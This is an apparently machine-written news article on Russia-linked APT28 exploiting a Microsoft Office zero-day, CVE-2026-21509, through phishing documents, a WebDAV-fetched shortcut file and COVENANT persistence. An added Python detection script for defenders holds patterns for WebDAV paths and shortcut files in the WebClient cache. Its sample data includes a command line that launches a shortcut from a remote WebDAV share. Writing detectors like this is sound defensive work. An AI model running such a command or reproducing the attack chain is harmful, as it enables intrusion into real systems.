Ethical Hacking News
APT28 Attackers Exploit New Microsoft Office Zero-Day, Wreaking Havoc on Ukraine and EU Targeted Organizations
Russia-linked attackers have already begun exploiting a newly discovered zero-day in Microsoft Office, with Ukraine's national cyber defense team warning that the same bug is being used to target government agencies inside the country and organizations across the EU. The APT28 group, also known as "Fancy Bear," has been linked to numerous high-profile attacks against government agencies, corporations, and other organizations across Europe and beyond.
Russia-linked attackers, driven by APT28 (Fancy Bear), have exploited Microsoft's latest Office zero-day, CVE-2026-21509. A weaponized document was publicly available just days after Microsoft sounded the alarm about the flaw. A phishing campaign impersonating official correspondence was also launched, targeting over 60 recipients in Ukraine and across the EU. The attackers deployed the COVENANT post-exploitation framework to maintain persistence and establish a foothold. CERT-UA warned that the number of cyberattacks using this vulnerability will increase due to the group's adaptability and the inertia of patching processes. Microsoft has released patches for older Office builds, but CERT-UA is concerned about how quickly they will be adopted.
Microsoft's latest Office zero-day, CVE-2026-21509, has already been exploited by Russia-linked attackers, with the activity being driven by APT28, also known as "Fancy Bear." This attack is part of a larger campaign that has seen the use of malicious documents and phishing campaigns to target government agencies in Ukraine and organizations across the EU.
According to an alert published by Ukraine's national cyber defense team, CERT-UA, the first weaponized document surfaced just days after Microsoft sounded the alarm about the flaw. A file titled "Consultation_Topics_Ukraine(Final).doc" appeared publicly on January 29, with metadata showing it was created on January 27, the day after Microsoft published details of the flaw. That turnaround suggests the exploit chain was already prepared and waiting.
Ukrainian incident responders were alerted to a parallel phishing campaign impersonating official correspondence from the Ukrhydrometeorological Center, with over 60 recipients receiving emails carrying a malicious DOC attachment. Opening the file in Office quietly initiates a WebDAV connection to an external server, downloads a shortcut file, and uses it as a launchpad for further malware.
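As an added defender-side illustration (not code from the article or from CERT-UA), the following correlates Sysmon-style endpoint events for the chain described above: a shortcut landing in the WebClient's WebDAV cache, an Office process spawning a child, or a command line referencing a WebDAV-style UNC path. The event field names, the Tfs_DAV cache location, the host names and all sample records are constructed assumptions.

```python
# Added example (not from the article or CERT-UA): correlate Sysmon-style events for
# the Office -> WebDAV -> .lnk chain. Field names, the WebClient cache path and all
# sample records are constructed assumptions for illustration.
from datetime import datetime, timedelta

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
WEBDAV_MARKERS = ("davwwwroot", "@ssl", "@80")          # WebDAV-style UNC path fragments
WEBDAV_CACHE = "\\tfsstore\\tfs_dav\\"                   # WebClient download cache (assumed)

def classify(ev):
    """Map one event to a stage of the chain, or None if it looks benign."""
    if ev["event"] == "ProcessCreate":
        if ev["parent_image"].rsplit("\\", 1)[-1].lower() in OFFICE:
            return "office_child_process"
        if any(m in ev["cmdline"].lower() for m in WEBDAV_MARKERS):
            return "webdav_unc_reference"
    elif ev["event"] == "FileCreate":
        tgt = ev["target"].lower()
        if tgt.endswith(".lnk") and WEBDAV_CACHE in tgt:
            return "lnk_in_webdav_cache"
    return None

def detect(events, window=timedelta(minutes=10)):
    """Return one finding per host that shows >= 2 distinct stages within `window`."""
    by_host = {}
    for ev in events:
        stage = classify(ev)
        if stage:
            by_host.setdefault(ev["host"], []).append((datetime.fromisoformat(ev["time"]), stage))
    findings = []
    for host, hits in sorted(by_host.items()):
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            stages = {s for t, s in hits[i:] if t - t0 <= window}
            if len(stages) >= 2:
                findings.append({"host": host, "stages": sorted(stages)})
                break
    return findings

WINWORD = "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
SAMPLE_EVENTS = [  # constructed: one suspicious host (ws-12) and one benign host (ws-07)
    {"event": "FileCreate", "host": "ws-12", "time": "2026-01-29T09:00:07",
     "target": "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\TfsStore\\Tfs_DAV\\s\\update.lnk"},
    {"event": "ProcessCreate", "host": "ws-12", "time": "2026-01-29T09:00:09", "parent_image": WINWORD,
     "cmdline": "cmd.exe /c \\\\203.0.113.5@80\\DavWWWRoot\\s\\update.lnk"},  # placeholder address
    {"event": "ProcessCreate", "host": "ws-07", "time": "2026-01-29T09:05:00",
     "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))  # flags ws-12 only
```

Requiring two distinct stages per host keeps a lone Office child process (common with add-ins and print dialogs) from paging anyone on its own.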
The attackers have now deployed the COVENANT post-exploitation framework, which routes its traffic through a legitimate cloud storage service, helping it blend in with everyday traffic rather than standing out as obviously hostile. This has allowed the attackers to maintain persistence and establish a foothold that they can return to.
CERT-UA warned that the number of cyberattacks using this vulnerability will begin to increase in the near future, partly because users are slow to update, or unable to update, the Microsoft Office suite and to apply the recommended protection mechanisms. The prediction rests on how quickly the attackers were able to exploit the zero-day and deploy their malicious framework.
The APT28 group has previously been linked to numerous high-profile attacks against government agencies, corporations, and other organizations across Europe and beyond. The use of a new Microsoft Office zero-day by this group suggests that they are adapting their tactics to take advantage of newly available vulnerabilities and remain one step ahead of security measures.
In an effort to mitigate the risk posed by this vulnerability, Microsoft has released patches for older Office builds that initially sat in limbo. However, CERT-UA is still not optimistic about how quickly these patches will land, given how slowly updates are typically applied and that some users cannot update at all.
The recent exploitation of CVE-2026-21509 serves as a stark reminder of the importance of staying vigilant and taking proactive measures to protect against emerging threats. It also highlights the need for organizations to regularly review and update their security protocols to prevent similar attacks in the future.
In conclusion, the APT28 group's exploitation of Microsoft's latest Office zero-day marks a concerning development in the ongoing cat-and-mouse game between attackers and defenders. As more organizations become aware of this vulnerability, it is essential that they prioritize patching and take immediate action to protect themselves against potential attacks.
Related Information:
https://www.ethicalhackingnews.com/articles/Apt28-Attackers-Exploit-New-Microsoft-Office-Zero-Day-Wreaking-Havoc-on-Ukraine-and-EU-Targeted-Organizations-ehn.shtml
https://go.theregister.com/feed/www.theregister.com/2026/02/02/russialinked_apt28_microsoft_office_bug/
https://thecyberexpress.com/russian-apt28-exploit-zero-day-cve-2026-21509/
https://thehackernews.com/2025/05/russia-linked-apt28-exploited-mdaemon.html
https://attack.mitre.org/groups/G0007/
https://www.picussecurity.com/resource/blog/apt28-cyber-threat-profile-and-detailed-ttps
Published: Mon Feb 2 12:35:11 2026 by llama3.2 3B Q4_K_M